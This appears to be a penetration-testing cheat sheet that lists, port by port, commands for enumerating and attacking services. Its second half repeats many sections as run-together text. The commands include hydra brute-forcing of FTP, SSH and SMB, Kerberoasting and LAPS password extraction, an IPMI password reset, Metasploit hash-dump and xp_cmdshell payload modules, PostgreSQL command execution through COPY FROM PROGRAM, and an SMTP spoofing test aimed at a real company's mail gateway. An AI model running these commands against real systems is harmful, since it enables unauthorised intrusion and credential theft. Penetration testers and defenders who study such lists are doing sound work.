Ports & Enumeration

Quick list of enum for ports

FTP / Port 21:

ftp -a IP
ftp ftp://USER:PASS@IP
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 21 ftp://URL

SSH / Port 22:

hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 22 SSH://URL

Telnet / Port 23:

nc -vv IP PORT

STMP/ port 25:


nc -vv IP 25 
echo EHLO
RCPT TO: brian@Fake.com
MAIL FROM: client@client.com
data
pwned 
.

swaks -n -hr -f chris@example.org -t blah@nintendo.com -s smtpgw1.nintendo.com:25

DNS / Port 53:

host -t axfr URL 
dnsrecon -d URL -t axfr
dnsenum URL

TFTP/port 69:

nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>

HTTP/s port 80/8080/8000/443/8443:

nikto -host URL:PORT -C all 
feroxbuster -u URL:PORT -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o OUTPUT.txt
gobuster dir -u URL:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
wpscan --url URL:PORT --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive 
whatweb --color=never --no-errors -a 3 -v URL:PORT
wkhtmltoimage --format png URL:PORT OUTPUT.png
curl -sSikf URL:PORT/robots.txt

Kerberos/ port 88:

crackmapexec ldap IP --kerberoast

POP3/ port 111/ 995:

USER username
PASS password
LIST
RETR 1

IDENT/ port 113:

apt install ident-user-enum
ident-user-enum IP PORT-TO-QUERY
ident-user-enum IP 22 100000

RPC/ port 135:

rpcmap -U '' IP
rsysinfo 192.168.10.1
nmap -sSUC -p111 192.168.10.1
rusers -l 192.168.10.1

SMB/ port 137-139/445:

smbmap -H IP 
smbclient '\\IP\' -L 
smbclient '\\IP\SHARE'
crackmapexec smb IP --shares 
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 445 SMB://URL

SNMP / Port 161:

snmp-check IP
snmpwalk -v 1 -c public 192.168.0.42
snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25
                                   .1.3.6.1.2.1.1.5          Hostname
                                   .1.3.6.1.4.1.77.1.4.2     Domain name
                                   .1.3.6.1.4.1.77.1.2.25    Usernames
                                   .1.3.6.1.4.1.77.1.2.3.1.1 Running services
                                   .1.3.6.1.4.1.77.1.2.27    Share information

LDAP/ Port 389/636:

ldapsearch -x -h IP -D '' -w '' -b "DC=DOMAIN,DC=DOMAIN" | grep sAMAccountName:
ldapsearch -v -x -D USER@DOMAIN -w PASSWD -b "DC=DOMAIN,DC=DOMAIN" -h IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

GetADUsers.py DOMAIN/ -dc-ip IP -all | awk '{print $1}' | tee users.txt
GetNPUsers.py DOMAIN/ -dc-ip IP -usersfile users.txt
GetUserSPNs.py DOMAIN/ -dc-ip IP
GetUserSPNs.py hutch.offsec/ -dc-ip 192.168.76.122 -usersfile users.txt -request
Get-GPPPassword.py USER:PASS@IP

HTTPs / Port 443+:

#Tls Extensions
openssl s_client -tlsextdebug -connect www.google.com:443
# ssl resumption
sslyze --resum www.163.com:443
# ssl renegotiation
sslyze --reneg www.ibm.com:443
# cert info 
openssl s_client -connect www.google.com:443
# compression 
sslyze --compression www.google.com:443
# tls fallback
openssl s_client -connect www.example.com:443 -no_tls1_2 -fallback_scsv
# known ssl key 
nmap -p443 --script ssl-known-key 192.168.0.15

Apple Filling Protocol (AFP) / Port 548:

#Nmap scripts: 
# Lists available AFP volumes and files
afp-ls 
# Lists all AFP volumes and files
afp-path-vuln 
# Displays AFP server information
afp-serverinfo 
afp-showmount

IPMI / Port 623 (UDP):

use auxiliary/scanner/ipmi/ipmi_version
use auxiliary/scanner/ipmi/ipmi_dumphashes
use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123

Rsync / Port 873:

docker run -t ullaakut/cameradar
docker run -t ullaakut/cameradar -t 80.169.239.143 -p 554

Rsync / Port 873:

rsync -rdt rsync://IP:PORT
rsync -av USER@IP::FOLDER/ .

MsSQL / Port 1433:

git clone https://github.com/NetSPI/PowerUpSQL
import-module ./powerupsql.ps1
$user = "publicuser"
$pass = "GuestUserCantWrite1"
$i = "10.10.11.202,1433"
Invoke-SQLAudit -verbose -instance $i -username $user -password $pass            


# Enumerate server configuration
mssql_enum
# Local privilege escalation
mssql_escalate_dbowner
mssql_escalate_execute_as 
# Crawl available databases for useful content 
mssql_findandsampledata
# Extract encrypted user password hashes 
mssql_hashdump
# Search the database for interesting data 
mssql_idf
# Add privileged local user accounts 
mssql_local_auth_bypass
# Exploit linked database servers 
mssql_linkcrawler
# Steal NTLM service credentials via SMB 
mssql_ntlm_stealer
# Execute OS commands via xp_cmdshell 
mssql_payload
# Extract the database schema 
mssql_schemadump
# Load and execute SQL statements from a file 
mssql_sql_file

Oracle Transparent Network Substrate (TNS) / Port 1521:

# Get versioning 
tnscmd10g version -h 10.11.21.25

# useful commands: 
# Ping the listener
ping 
# Provide output of the listener version and platform information
version 
# Return the current status and variables used by the listener
status 
# Dump service data
services 
# Dump debugging information to the listener log
debug 
# Reload the listener configuration file
reload 
# Write the listener configuration file to a backup location
save_config 
# Invoke listener shutdown
stop 


# Meterpreter: 
use auxiliary/scanner/oracle/sid_enum
use auxiliary/scanner/oracle/sid_brute
nmap -p1521 --script oracle-brute --script-args oracle-brute.sid=TEST 
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30


# authenticate: 
# download and save
/opt/oracle/instantclient-basic-linux-XXXX.zip
/opt/oracle/instantclient-sqlplus-linux-XXXX.zip
export PATH=$PATH:/opt/oracle/instantclient_12_1
export SQLPATH=/opt/oracle/instantclient_12_1
export TNS_ADMIN=/opt/oracle/instantclient_12_1
export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1
export ORACLE_HOME=/opt/oracle/instantclient_12_1

# login 
sqlplus perfstat/perfstat@10.11.21.20:1521/TEST

NFS / port 2049:

Showmout -e IP
Mount -t nfs -o vers=2 -o nolock IP:/home /nfs

iSCSI / Port 3260:

nmap –p3260 --script iscsi-brute 192.168.56.5

MySQL / Port 3306:

# brute login 
use auxiliary/scanner/mysql/mysql_login
# Return the basic configuration and server settings
mysql_enum
#Extract username and password hash values
mysql_hashdump 
# mysql_start_up Execute OS commands (Windows)
mysql_payload
# Display the database schema
mysql_schemadump 
# Execute arbitrary SQL statements
mysql_sql

ZeroMQ ZMTP / port 4505/4506:

msfconsole: linux/misc/saltstack_salt_unauth_rce

SIP/ Port 5060:

smap -o PBX
# enum potential hosts
svmap.py 192.168.1.1/24
# user enum
svwar.py -e100-300 PBX-IP -m INVITE
# sniff traffic and output a pcap
sidump auth.txt -p auth.pcap
# crack the hashes
sipcrack auth.txt -w wordlist.txt
# nmap and grab mac address the capture call (will output in wav format)
ucsniff -i eth9 -T 

# Metersploit
use auxiliary/sip_invite_spoof

PostGresql / Port 5432:

# brute user
use auxiliary/scanner/postgres/postgres_login

# login
psql -h IP -U USER

# list databases
\list 
#connect to database
\c DATABASE 
# list tables
\dt 
SELECT usename, passwd FROM pg_shadow;
pg_dump --host=IP --username=USER --password --dbname=DB --table='TABLE' -f output_pgdump

## Code Execution
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM ‘CODE’;
SELECT * FROM cmd_exec;

# Meterpreter
# Execute arbitrary SQL statements
postgres_sql 
# Extract username and password hash values
postgres_hashdump 
# Display the database schema
postgres_schemadump 
# Import a local file and display it (e.g., /etc/passwd)
postgres_readfile 
# Load a shared object via pg_largeobject and create a UDF to execute arbitrary code on the server side
postgres_payload

Redis / Port 6379:

# auth
redis-cli -h 109.206.167.35
# get keys 
keys *

WSUS/ port 8530 & 8531:

SharpWSUS
pyWSUS

Memcache/ port 11211:

echo "version" | nc -vn -w 1 <IP> 11211      #Get version
echo "stats" | nc -vn -w 1 <IP> 11211        #Get status
echo "stats slabs" | nc -vn -w 1 <IP> 11211  #Get slabs
echo "stats items" | nc -vn -w 1 <IP> 11211  #Get items of slabs with info
echo "stats cachedump <number> 0" | nc -vn -w 1 <IP> 11211  #Get key names (the 0 is for unlimited output size)
echo "get <item_name>" | nc -vn -w 1 <IP> 11211  #Get saved info

# meterpreter: 
use auxiliary/gather/memcached_extractor

MongoDB / Port 27017:

mongo mongodb://USER:PASS@IP:PORT/
show dbs
use DB 
show tables 
db.TABLE.find()

gRPC / Port 50051:

https://github.com/fullstorydev/grpcui
https://github.com/fullstorydev/grpcurl

NextAntivirus Evasion

Last updated 3 months ago

nikto -host URL:PORT -C all feroxbuster -u URL:PORT -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o OUTPUT.txt gobuster dir -u URL:PORT -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt wpscan --url URL:PORT --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive whatweb --color=never --no-errors -a 3 -v URL:PORT wkhtmltoimage --format png URL:PORT OUTPUT.png curl -sSikf URL:PORT/robots.txt

smbmap -H IP smbclient '\\IP\' -L smbclient '\\IP\SHARE' crackmapexec smb IP --shares hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000.txt -e nsr -s 445 SMB://URL

snmp-check IP snmpwalk -v 1 -c public 192.168.0.42 snmpwalk -c public 192.168.102.251 .1.3.6.1.4.1.77.1.2.25 .1.3.6.1.2.1.1.5 Hostname .1.3.6.1.4.1.77.1.4.2 Domain name .1.3.6.1.4.1.77.1.2.25 Usernames .1.3.6.1.4.1.77.1.2.3.1.1 Running services .1.3.6.1.4.1.77.1.2.27 Share information

ldapsearch -x -h IP -D '' -w '' -b "DC=DOMAIN,DC=DOMAIN" | grep sAMAccountName: ldapsearch -v -x -D USER@DOMAIN -w PASSWD -b "DC=DOMAIN,DC=DOMAIN" -h IP "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd GetADUsers.py DOMAIN/ -dc-ip IP -all | awk '{print $1}' | tee users.txt GetNPUsers.py DOMAIN/ -dc-ip IP -usersfile users.txt GetUserSPNs.py DOMAIN/ -dc-ip IP GetUserSPNs.py hutch.offsec/ -dc-ip 192.168.76.122 -usersfile users.txt -request Get-GPPPassword.py USER:PASS@IP

#Tls Extensions openssl s_client -tlsextdebug -connect www.google.com:443 # ssl resumption sslyze --resum www.163.com:443 # ssl renegotiation sslyze --reneg www.ibm.com:443 # cert info openssl s_client -connect www.google.com:443 # compression sslyze --compression www.google.com:443 # tls fallback openssl s_client -connect www.example.com:443 -no_tls1_2 -fallback_scsv # known ssl key nmap -p443 --script ssl-known-key 192.168.0.15

use auxiliary/scanner/ipmi/ipmi_version use auxiliary/scanner/ipmi/ipmi_dumphashes use auxiliary/scanner/ipmi/ipmi_cipher_zero ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123

git clone https://github.com/NetSPI/PowerUpSQL import-module ./powerupsql.ps1 $user = "publicuser" $pass = "GuestUserCantWrite1" $i = "10.10.11.202,1433" Invoke-SQLAudit -verbose -instance $i -username $user -password $pass # Enumerate server configuration mssql_enum # Local privilege escalation mssql_escalate_dbowner mssql_escalate_execute_as # Crawl available databases for useful content mssql_findandsampledata # Extract encrypted user password hashes mssql_hashdump # Search the database for interesting data mssql_idf # Add privileged local user accounts mssql_local_auth_bypass # Exploit linked database servers mssql_linkcrawler # Steal NTLM service credentials via SMB mssql_ntlm_stealer # Execute OS commands via xp_cmdshell mssql_payload # Extract the database schema mssql_schemadump # Load and execute SQL statements from a file mssql_sql_file

# Get versioning tnscmd10g version -h 10.11.21.25 # useful commands: # Ping the listener ping # Provide output of the listener version and platform information version # Return the current status and variables used by the listener status # Dump service data services # Dump debugging information to the listener log debug # Reload the listener configuration file reload # Write the listener configuration file to a backup location save_config # Invoke listener shutdown stop # Meterpreter: use auxiliary/scanner/oracle/sid_enum use auxiliary/scanner/oracle/sid_brute nmap -p1521 --script oracle-brute --script-args oracle-brute.sid=TEST nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30 # authenticate: # download and save /opt/oracle/instantclient-basic-linux-XXXX.zip /opt/oracle/instantclient-sqlplus-linux-XXXX.zip export PATH=$PATH:/opt/oracle/instantclient_12_1 export SQLPATH=/opt/oracle/instantclient_12_1 export TNS_ADMIN=/opt/oracle/instantclient_12_1 export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_1 export ORACLE_HOME=/opt/oracle/instantclient_12_1 # login sqlplus perfstat/perfstat@10.11.21.20:1521/TEST

# brute login use auxiliary/scanner/mysql/mysql_login # Return the basic configuration and server settings mysql_enum #Extract username and password hash values mysql_hashdump # mysql_start_up Execute OS commands (Windows) mysql_payload # Display the database schema mysql_schemadump # Execute arbitrary SQL statements mysql_sql

smap -o PBX # enum potential hosts svmap.py 192.168.1.1/24 # user enum svwar.py -e100-300 PBX-IP -m INVITE # sniff traffic and output a pcap sidump auth.txt -p auth.pcap # crack the hashes sipcrack auth.txt -w wordlist.txt # nmap and grab mac address the capture call (will output in wav format) ucsniff -i eth9 -T # Metersploit use auxiliary/sip_invite_spoof

# brute user use auxiliary/scanner/postgres/postgres_login # login psql -h IP -U USER # list databases \list #connect to database \c DATABASE # list tables \dt SELECT usename, passwd FROM pg_shadow; pg_dump --host=IP --username=USER --password --dbname=DB --table='TABLE' -f output_pgdump ## Code Execution CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM ‘CODE’; SELECT * FROM cmd_exec; # Meterpreter # Execute arbitrary SQL statements postgres_sql # Extract username and password hash values postgres_hashdump # Display the database schema postgres_schemadump # Import a local file and display it (e.g., /etc/passwd) postgres_readfile # Load a shared object via pg_largeobject and create a UDF to execute arbitrary code on the server side postgres_payload

echo "version" | nc -vn -w 1 <IP> 11211 #Get version echo "stats" | nc -vn -w 1 <IP> 11211 #Get status echo "stats slabs" | nc -vn -w 1 <IP> 11211 #Get slabs echo "stats items" | nc -vn -w 1 <IP> 11211 #Get items of slabs with info echo "stats cachedump <number> 0" | nc -vn -w 1 <IP> 11211 #Get key names (the 0 is for unlimited output size) echo "get <item_name>" | nc -vn -w 1 <IP> 11211 #Get saved info # meterpreter: use auxiliary/gather/memcached_extractor